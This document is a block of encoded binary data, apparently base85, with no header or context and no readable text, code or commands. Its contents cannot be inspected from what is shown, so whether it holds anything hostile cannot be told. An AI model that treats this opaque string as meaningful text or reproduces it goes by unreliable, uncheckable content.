zJL&ZPQFx$%*D#xD84BXz(JtIoR(t>qww{`rQaP*vj!@UXELnX!#gjF1*JRQ)HE{3q z`7Dir>s7@^o1l*u%$966w@{s5KSQ>wL(YaS6}`@#>3ttgRzx-0a`rR0%{yBh*HotS z9E{#l0fitS{vH`KeYV&{9WN@m(dO zQS}Q`w_Fga^R=(EF?v1RY`G>4Vk5Oue5SMCxBE9_iL!{y7pd}}`h||)A!WC|!hc4w z@+w|#Kjl{(@veGXPGZ0-e%9Si{ia=-$`DyBE7%Vz@&pLzFGMsSG3G-f0zm{RQDO?+EVQw;r-U15v{cCCP5gv={>T zB3E64@2WamSA~Cm+!O5!92X%DF_d|WDiE)%HQskFjy^NtPr$eL`|F3p-|U};WB+2k z!pOIl#NbxX?656DjN-(%;2v7~+t$?Jao@xC|4_d}U^66npm_nu_x%pc@j?5f715%< z;XmlptVDydC248poNpiFslC@v*gEK=)8z;&JSR;I@8A+ak{ke1VO>yaf3|&K7vq*5 zUpqsT$t?%Bwspk%aTlz*MHiLLxA&Cz1~PE%H`CfLGQ(qC`!H+1obK&+RUaa6Uk4W1 zUGfu1m1eQk6+#MCF`F}HAXGux0G;??4oD=_Anm9R7&wy^omVxHfDiGg&U^Htxn_t<)Ef6GZbLxprcXQp>ndawy=(Ogz{9BE$z z^F?Cj8JA|hm&x};r7y&Z3wV>o(n}ZP2NfcRlDYZ=l-iNr^-T%PI*G8O3d%WKo>_TN zg_wN}z_Jmy9p{g{=aPBUGGtI0O*2 z+ClW};1KfoGCCA%`Y4NT5&gZ70~hZX*zYF`86+6pK|ctM(%NyWpY5Pm(8AZVQG9K} 
z5vzu5ZR<=UdQ|evY3U&5vZlHcaBl{G!V=S<9|+Lfe7^H?($`E$F5q)QAjkg<`6t+< zNFIgl@q_j#Ci7?WSF5m@3K=1!8|i!F{O>ERg+)e->l;qOIZ8P=ZJY)6v!yS=6q_3Ci^Cu2I z&HE0=%o!plmK3b%}mw>uysuWt+_gl64 z7SC*u%y;_23Ms;GVdXtvK*HweT9YC4R6(7?w(&wovABhb|H7k&$H07fnSuSWv*}`! z0LX4?hk2-0j_N$4p>j8iusjQ)ggzW7t5fYg7qW4I9G@+gT07SUmAAAZi#1hxB#wLu zlhBQ}y@CS3r%X}9-+UR_k_C*U(TfgtOM=EnY}5A+L2-rPw+!`bWR$wOAr}0Wtuit?$bIXT`2S&aY)YujzG%Q+g*~-bvU7}*|yqMp>!CpEXpb=%cS1j zO3xprND*uQWB!q6tbI1+$X6fL*VoXQ7d~+b^eZjI{SE$99TK%_kFX_{6q=1xWMj^^ z0y}O2<$?$a5yTjQ0+72MA;|Dy^rTUNo#X}Fx&8#sN=c%?zP61~Pm&$Ddr10d_b<%| z1~e0^icBA(o`Ozce*s3Y@>hrUu;^bGT_d}^G%cB~K$w7_NFQ;ER)<)T@1t>v^_S&< z%Aytj&16ZS*l^&m-Laz1jtBw~-H4y5spmoh=}PKRs^5!9zTV&5Ye;sTn23F;Qx?tP zW^;1TuFdElSa6Q^Efa~SDj+U-P{QZ40u0h>YC<(<;FZQAj|3et*X11)U-YB#TO>+HT@Zz*&)X#C|O&DZ<3+yR%IRu+coi zL-{Eu@Z(n{Omj{F(@@|%GG4DDLi;_oovo52U~|6dd^h??P? zJK9e;VV0Ev9@#tBah5AYGT(`{`NnJ=rHBau<^;yQaV?#yC1}2FxL& zx)JZEIr1}QkOw?4R_e=n(jRHnSAS3kB>j`rc8kVsZC;THCmH}j01=yiC_Jqmeb;KH zO*9zAQEcMsy=%b8fBAN7<#j|r6n&mIO*X}dTA=E!M6GZQ^{cVv^YfinGk2;dj-?76 zIsz;{y>R_I*{_VwFCLD{0NWb@cmK$Xw;%kwOomD^@1tbN7gU3eM!Nan9DNHzHqw=A zG-#Tw=lnkClUo#twz2lgmPyhD<{)Ec*0Q)>377x10AT&R8R5gN6vVk8f>k|d_+a#0 z$sGZ$nU`IakHGN~IWXc36OU$a#QhQ3QrjC(!i~ENRhxeenKt4T_#$Dle!2!|wl7`k zs(6y~50?MSlgjd6>GwWIt?H_(s&ju;w*#;n;IDdul8FFTzgMpo`#!V&;YkJ51LPh4 z?@b(yz@a_=h#&sF^MB>`|L~-WKu%KGu+?mAY_Ok9?(J31r{TUc?xlk(XILd`aF6V! 
zYw~0R?+fJwfI@&V)Y2x#QNCDQ&L4b=I?wWF**b3Asj`mGkVh5NzI+#$p3L{dfn4Xe zed%42IUt8=N1Z@DQnwaaf5J#hvJ0$&NB+3~F$&p)f$!O>UInN|CaTMX5bT*wXJ`pf zf94x~I{X9IY>>K<;^yYP9?x_jRlZ43oZ*G7fvHju4oB3O=vealuo^mYEX!whbBSwT zes({!lCeTl1*T_QtC#VR4-)ouVCe2S-_H_(;otX%*ZxlVgDaq~#W;Z&&4>}#xd{{_ zm=;|Tk|a|%j*Dot?f6ktsO8Fnv%PA$1NS@wV!`y$E`Pg2e;imb9M3CU!z-mZ`NnA?sI$-Eo4TiH2(cq6Tc&|@7TFLJzvzglxcoVuyWsHrHGcRakr9we zYg+VDU(!FP`OO2aQ_DKS7h<8||H<^@lW~L>7n&_IvF@fmoUI1cy9*Txw{4-~Ogpm+ zO)P=6K+BwhE8;=XD=~^XXhG$rU3t@m)sq&kEvfC)&CAd4w^gpHuKnON?r?TYD8F&+ zWP(@2-oV3dt;AMH-;L8&1L|rXpzN>N+>aHhmMyfLndHgxiqW+X>O&cQMY8i>j$t+U zP2wiHmz8~+hZWlIG>eOV!Xf+sfbhCOBXi|QCH>2*N}^!Rj}wwC-(~x+KHvLjK+&Gu zLuoD4xEE=WR9=VSSi40T$Xa~71H;5lKHYDyCn$bBrq6L97O`AeG%)>{U%~xQ=ohUU zdt&3JL|D`b`jTJ2)v8Nq9N$=wARH_WMYz`#o#)h#i$__^VzDQefe^|TZD$BuXznkU z{lTG6cNMj;546rlww3(D?B&xOVEo+$@8~Qvs9jX)2zQb`1UdsAndaz3cnl25zsHJq z5?OJ^)}D(cDb_Bv*rSh^aLA>ruJdk=Ip8t?6b(BpO^F8ZGt(MNDaIePP2roW{;XoZ zbMSJULwRuz>8@{CVWa>!A86327Ld zNv?kFK?#Nv^^}?0FPYA!hypoP5B@X+xl@#x&8MKJpdsaR@-{yvu%TV>>{~i17Fh^5 zXK0YZuC@xK$0WS)OatZVDEsO|Rpi5-Mv23w=>WLp1aWgf^erh)m|8$^RH7Nlx^1?H z>sFl;T8|`Yv(yRyx;|b1F(Jt=RY2Q~W^Bbn1xJ${A3wXkU6);2ZO=h^VWVHiXBp?Q zy1#zQjnZVD|1fa`U5_DN%|hS-JiL|a2|VSlC^qD&j4rW z?T*c0KBEklfD+A^wj8)jcmGzBL_01V>8~$j5Ve$K~p;#6x1`4aOP#l;T zZ=42hKaUI0Haf``)8-Owq8kfPp1uHTys3eGzQKH5f@=naj8Y`jt2Df8ZvYteyky+D zq)1txgCAG(!8)it?VV%)r*dk`4s}lOWj^11*QX~V;Ho8qg=&T9Yzj8RZRNU7-B}l>?Jq=KuK#qA))GwLo2vsOa^i zKF3I&g3$?+KQ;eafWEZ<;`=4@du`=-T^Pzyg-@M)pF1+;;Fb4hvYKp=OT37zb*m0G z8Z>BBHt}x62+>Y*{DK9sMDg$^t17bgaVq~X-Y-Ea_UAU(G<`ssKi|t`J!g3(XI=5W zhO}Xdb>7>rY{7{3*QL(d$LT3v?4sd+6YY~5k_J`jN(@|6Y95!w!1eC_TKUD-NjzFA z#gdq2RMi9s8Ud}ZHBb%OM{e&olP+vUW;z>P-vITeYE3NP1dR>YxVWuJv)>r;&t6hB zQ?jwQT0F89u&3aDWpbsk@QyvW`A^afb^M~WkZzju3uNhi&ye7I{(T&`suehL@9z(7 zA3yimfIrG8)!3}HPa7(n^Ww6)MWav^r~TrkZO_W!hW-3J&tF!=DEJJ>PA<02izUq# zT3d3D*;9L(akh-Ufnv~dKNyw+6q6emKo8ni$%71#{#Lxjzpn7cD!?uWi1(Qkvdm!> z7EGd|2?YdAA=cEqc!<8iDW;OnD#e{6j;pQjrWpIR?{w8rzq2-P^{~wFZp`E9RVgNq zJ+78S63K+g 
zW<;B}}ZX{quYOry_0_1(~ikwYNJzhRseI`9NJ)MvOl>$bEagxvI u&?GcGxzQ5Di9@$oi~pxl<(wk_ItI5H^E#!X`Ks}N*IgA&